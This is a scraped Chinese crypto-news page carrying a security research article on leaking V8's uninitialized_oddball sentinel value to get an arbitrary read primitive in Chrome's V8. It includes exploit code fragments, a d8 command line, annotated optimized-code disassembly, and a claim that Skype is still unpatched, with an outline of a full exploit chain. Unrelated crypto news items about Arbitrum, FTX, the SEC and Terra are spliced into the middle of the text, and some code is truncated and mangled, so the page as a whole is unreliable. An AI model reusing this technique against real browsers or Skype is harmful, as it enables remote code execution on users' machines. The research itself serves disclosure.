BTC/HKD-0.25%
ETH/HKD+0.46%
LTC/HKD-0.02%
DOT/HKD-0.64%
ADA/HKD-0.03%
SOL/HKD-0.74%
XRP/HKD-0.74%
DOGE/US-0.53%前言
Sentinelvalue(又名flagvalue/tripvalue/roguevalue/signalvalue/dummydata)是算法中的一個特殊值,通常在循環或遞歸算法中作為終止條件的特殊值存在。Chrome源碼中有很多Sentinelvalue。from-leaking-thehole-to-chrome-renderer-rce和TheHoleNewWorld-howasmallleakwillsinkagreatbrowser(CVE-2021-38003)中,都介紹了如何通過泄露TheHole對象實現CVE-2021-38003和CVE-2022–1364的沙箱內任意代碼執行。在我們發文闡述該緩解繞過大概一周后,谷歌團隊也迅速把這兩個在野CVE同步更新到了github上。時間節點如下:
{this</p>
<p> <b>fhi(f){this</b></p>
<p> flow(f){this</p>
<p> }functionUninitializedOddballExploiter(uninitialized_oddball){varh=newHelpers();letarr=newArray(0x1000000);arr=1</p>
<p> ;%PrepareFunctionForOptimization(read);read(exp2,0);%OptimizeFunctionOnNextCall(read);constold_space=0x200000;//0x200000letstart_offset=Math</p>
<p> 在ARB空投后的幾周內Arbitrum上的獨立用戶和交易數量平均保持在較高水平:金色財經報道,Nansen數據顯示,在ARB空投后的幾周內,與空投前的水平相比,Arbitrum上的獨立用戶和交易數量平均保持在較高水平。Arbitrum于3月23日空投了其ARB代幣,這將其交易量推至歷史新高。一天后,網絡上的新用戶數量創下歷史新高。 </p>
<p> 數據顯示,Arbitrum上的新用戶數量從歷史最高點開始緩慢下降,但仍高于Optimism。事實上,Abritrum一直在與以太坊競爭,經常在用戶和交易數量方面翻轉第二大區塊鏈。[2023/6/15 21:39:12]</p>
<p> }UninitializedOddballExploiter(%TheHole());//注意對%TheHole()做patch</p>
<p> 我們對上述代碼在v8-11.0.0中測試,當%TheHole()返回UninitializedOddball時,仍舊可以實現相對任意讀。</p>
<p> ./d8--expose-gc--allow-natives-syntax--print-opt-code--print-opt-code-filter=read--trace-turbo/home/avboy/Desktop/poc2.js</p>
<p> 對優化后的JavaScript的read函數去掉Prologue,留下關鍵反匯編如下所示:</p>
<p> 0x558b2000406929488b4d18REX.Wmovqrcx,0x558b2000406d2df6c101testbrcx,0x1;;checkifrcx(ie.obj,the1stargoffunction)is'Smi'0x558b20004070300f842e020000jz0x558b200042a4<+0x264>;;deoptreason'Smi'0x558b200040763641b831cd1900movlr8,0x19cd31;;(compressed)object:0x17140019cd31<Map(HOLEY_ELEMENTS)>0x558b2000407c3c443941ffcmpl,r8;;checkthemap(r8=0x19cd31isthemapofobj);;herewecheckthemapofobj,butwedidnotcheckthevalueofkey(ie.obj.prop);;andifwemakethevalueofkeytobeuninitialized_oddball,thereisthebypass0x558b20004080400f8522020000jnz0x558b200042a8<+0x268>;;deoptreason'wrongmap'0x558b2000408646448b410bmovlr8,;;*(addr(obj)+0xb)->r80x558b2000408a4a478b44060bmovlr8,;;r14ishighaddr0x558b2000408f4f4d03c6REX.Waddqr8,r14;;r8->inReadOnlySpace:#uninitialized0x558b2000409252458b4807movlr9,;;0x558b20004096564d03ceREX.Waddqr9,r14;;r9->0x2eb90000000d0x558b2000409959458b400bmovlr8,;;0x558b2000409d5d488b7d20REX.Wmovqrdi,;;rdiisindexofarr,the2ndargoffunction0x558b200040a16140f6c701testbrdi,0x1;;checkifrdiis'Smi'0x558b200040a5650f85da000000jnz0x558b20004185B5<+0x145>;;ifrdiisnot'Smi',JMP0x558b200040ab6b4c63dfREX.Wmovsxlqr11,rdi;;0x558b200040ae6e49d1fbREX.Wsarqr11,1;;r11/2,because'Smi'storedas'Smi'*2inMemory0x558b200040b1714d63c0REX.Wmovsxlqr8,r80x558b200040b47449d1f8REX.Wsarqr8,10x558b200040b7774d3bd8REX.Wcmpqr11,r8;;r11=0x40002,real_offsetastheindexofarr0x558b200040ba7a0f83ec010000jnc0x558b200042ac<+0x26c>;;deoptreason'outofbounds'0x558b200040c080c4817b1044d907vmovsdxmm0,;;movedoublefloatvaluetoxmm00x558b200040c787c5f92ec0vucomisdxmm0,xmm0;;ComparefloatvalueandSetEFLAGS0x558b200040cb8b0f8a88010000jpe0x558b20004259B9<+0x219>;;jpe(Jumpifparityeven)0x558b200040d1????91??0f8582010000?????????jnz?0x558b20004259??B9?<+0x219>??;;?jnz(Jump?if?not?zero)</p>
<p> 日本加密貨幣交易商Hibiki Trader已確認從FTX Japan提出全部資金:金色財經報道,FTX Japan此前于2月21日恢復提款,允許用戶將資金轉移到Liquid Japan賬戶,目前日本加密貨幣交易商Hibiki Trader已成功提取了所有資金,該交易所在社交媒體上確認了此事并表達了對FTXJP的感謝。[2023/2/27 12:30:58]</p>
<p> 在0x558b2000407c處,檢查了read函數的obj,確定其prop屬性正確,但沒有檢查以obj.prop為key的Value,而是直接按照JavaScript語義計算偏移,求取數組的數值。如此導致我們在計算的時造成類型混淆,實現任意讀。</p>
<p> 如上匯編所示,當我們傳入uninitialized_oddball時,從0x558b20004086開始以obj為起點計算,最終在vmovsdxmm0,指令中完成任意讀,數據保存在xmm0寄存器中。類似TheHole對象,由于uninitialized_oddball在v8內存中排序靠前,且對象內容更加原始,偽造更加容易,在TheHole緩解繞過修復后,該方法不失為繞過首選。同理,任意寫我們可以參考Issue1352549進行構造分析。由于原理雷同,這里不再贅述。</p>
<p> 這里修復建議是,對優化后的函數返回數組元素時,添加對數組map的檢查,避免直接計算偏移返回數組數值。</p>
<p> PatchGapAlert</p>
<p> 在我們談論PatchGap時,實際上我們不僅僅需要關注曾經出現的歷史漏洞,我們還要關注廠商在基礎組件中悄悄修復的漏洞。對Issue1352549分析后,我們迅速排查了可能存在PatchGap的軟件,這里不得不指出,截至目前Skype仍舊沒有對該漏洞進行修復。在x86下任意讀寫會稍有不同。x64下由于存在地址壓縮,在tuborgfun優化javascript生成的代碼中,v8會默認將基址加上。x86由于沒有基址,因此任意讀寫是直接相對于整個進程的。如下匯編所示:</p>
<p> 美SEC將FTX的代幣FTT稱為證券:金色財經報道,美國證券交易委員會(SEC)在周三晚些時候提交的對Alameda Research前首席執行官Caroline Ellison和FTX聯合創始人Gary Wang的訴訟中表示,FTX的代幣FTT作為投資合約出售,是一種“證券”,此舉肯定會對行業產生廣泛影響。 </p>
<p> 此前報道,美國證券交易委員會(SEC)指控Alameda Research前首席執行官Caroline Ellison和FTX聯合創始人Gary Wang欺詐FTX的股權投資者。[2022/12/22 22:01:00]</p>
<p> 0x3979b8ff3f8b790bmovedi,0x3979b902428b7f0bmovedi,0x3979b905458b4707moveax,;;eaxwillbeafixednumber0x3979b908488b7f0bmovedi,0x3979b90b4b8b5510movedx,0x3979b90e4ef6c201test_bdl,0x10x3979b911510f85b6000000jnz0x3979b9cd<+0x10d>0x3979b9175789d6movesi,edx0x3979b91959d1fesaresi,1;;esiisindex0x3979b91b5bd1ffsaredi,1;;0x3734b73a0x3979b91d5d3bf7cmpesi,edi0x3979b91f5f0f838e010000jnc0x3979bab3<+0x1f3>;;deoptreason'outofbounds'0x3979b92565c5fb104cf007vmovsdxmm1,xmm0,;;</p>
<p> 跨鏈預言機解決方案SupraOracles與NFT市場MADworld達成合作:6月18日,據官方消息,跨鏈預言機解決方案SupraOracles宣布與NFT市場MADworld達成合作。據悉,MADworld正在構建多元宇宙(multiverse)基礎設施層,以連接區塊鏈上的數字和實物所有權。SupraOracles的去中心化預言機可以確保MADworld市場獲取準確的NFT數據。[2022/6/18 4:37:09]</p>
<p> 如上所示,esi為任意讀數組的索引,eax為固定值,edi為)
因此,在edi范圍內,可以任意讀寫。在具體做skype的exp時,雖然此時我們沒有地址壓縮帶來內存讀寫的便利,且skype開啟了aslr。但由于該文件太大,直接放在4GB內存中,黑客只需要對某個固定地址進行讀寫,便可以一個極大的概率讀寫skype文件中的內容。結合PE解析等傳統思路,不難完成整個漏洞利用鏈。基于此,我們無法保證黑客不能在短時間內完成整個利用鏈的適配。
這次PatchGap實際上不止需要排查Issue1352549,由于一個新的繞過方法的公開,直接導致了類似Issue1314616和Issue1216437的利用難度大幅度降低,黑客幾乎不需要花費任何研究成本,即可實現以往任何泄露uninitialized_oddball漏洞的完整利用,包括谷歌clusterfuzz提交的所有Issue中類似的漏洞。
Do Kwon:開發人員提供的消息不實,Terra社區研究員再次進行反駁:6月10日消息,Do Kwon昨晚在推特上表示,Terra生態開發人員在脫錨事件后提供了很多錯誤及虛假信息,他將積極主動與媒體溝通以提供正確信息。Do Kwon稱,有許多關于“核心開發人員”提供有關Terra機制的專家訪談的傳聞,開源開發是透明的,我建議媒體檢查這些人員是否曾將他們的代碼投入生產。雖然TFL打算繼續支持和建設Terra 2.0網絡,但它不是TFL主導的鏈,我們有意識地退出了空投分配,所有決定都由各個社區團體做出,盡管以一種不穩定的方式。”
Terra社區研究員FatMan對此進行了反駁稱Do Kwon在撒謊,TFL并沒有退出空投,他們只是在他們主要的公開追蹤錢包上這樣做。對于代碼的問題,FatMan稱Anchor的核心研究員之一Marco di Maggio曾透露,Terra的經濟研究人員負責創造設計,而開發人員負責發布代碼,網絡開發人員和經濟模型研究人員之間是有分工的。
此前消息,FatMan曾爆料TFL持有價值超2億美元的LUNA,Do Kwon使用影子錢包操縱治理,此外他還披露了TFL相關的四個錢包地址。[2022/6/10 4:16:15]
總結
本文僅拋磚引玉,粗略來談通過泄露Sentinelvalue中的uninitialized_Oddball來實現任意讀原語。如第二部分所示,v8中的Sentinelvalue還有很多,實際上我們在測試Sentinelvalue的時候,也會經常容易遇到崩潰,不乏有非int3的崩潰出現。由于Uninitialized_Oddball和TheHole均已被證明可以在v8中實現環節繞過,我們有充分的理由懷疑其他Sentinelvalue也可能導致類似問題。
這也給我們一點提示:
01-其他uninitialized_Oddball泄露是否會輕松實現v8的RCE;
02-我們已經看到,谷歌會迅速將TheHole繞過進行修復,我們也看到利用垃圾回收實現ASLR繞過被長期擱置。這說明類似issue仍處在一個模糊邊界,即是否被正式當作安全問題對待。
03-如果02中的問題被當作正式安全問題對待,那么在fuzzer中是否有必要考慮將%TheHole/uninitialized_Oddball等Sentinelvalue作為變量加入,來挖掘其他利用原語;
這里不得不強調的是,無論該類問題是否被正式當作安全問題對待,它都會大大縮減黑客實現完整利用周期。
參考資料
https://bugs.chromium.org/p/chromium/issues/detail?id=1314616
https://bugs.chromium.org/p/chromium/issues/detail?id=1352549
https://bugs.chromium.org/p/chromium/issues/detail?id=1216437
https://starlabs.sg/blog/2022/12-the-hole-new-world-how-a-small-leak-will-sink-a-great-browser-cve-2021-38003/
WolfGame曾于2021年11月席卷GamFi領域,其游戲內的Sheep?NFT?價格從發售價0.069?ETH?一度飆升至10ETH,其代幣WOOL價格也在游戲發布后的兩三日內一度翻倍.
1900/1/1 0:00:00???2022年底,孫宇晨被任命為HuobiGlobal全球顧問委員會成員,他在個人社交賬號表示,將和其他委員一起,在行業發展、學術研究、合規風控等領域提供指導,進一步加強機構間合作.
1900/1/1 0:00:00最近Arbitrum可謂是大火特火,除了在Layer2遙遙領先的TVL和生態數量之外,兩個王牌生態GMX和Magic也是最近為數不多的上Binance項目,一時間,更多的目光投了過來.
1900/1/1 0:00:00注:本文來自TheBlockResearch推文,簡述過去一年加密貨幣市場發展態勢。對加密貨幣行業來說,2022年必將是載入史冊的一年,在世界各地的分析師團隊的幫助下,我們很自豪地發布了《202.
1900/1/1 0:00:00這些預測是從2023年初開始做出的。隨著這一年的進展,宏觀和監管環境可能會發生變化,以及創造新的敘事。但我認為,無論如何,嘗試一下預測會很有趣.
1900/1/1 0:00:00注:本文來自Uniswapblog,介紹以傳統金融市場中的支付方式買入加密資產的方法。從今天起,你可以在UniswapWebAPP上使用信用卡、借記卡或銀行轉賬以web3中最優惠的價格買入加密貨.
1900/1/1 0:00:00
比特幣行情
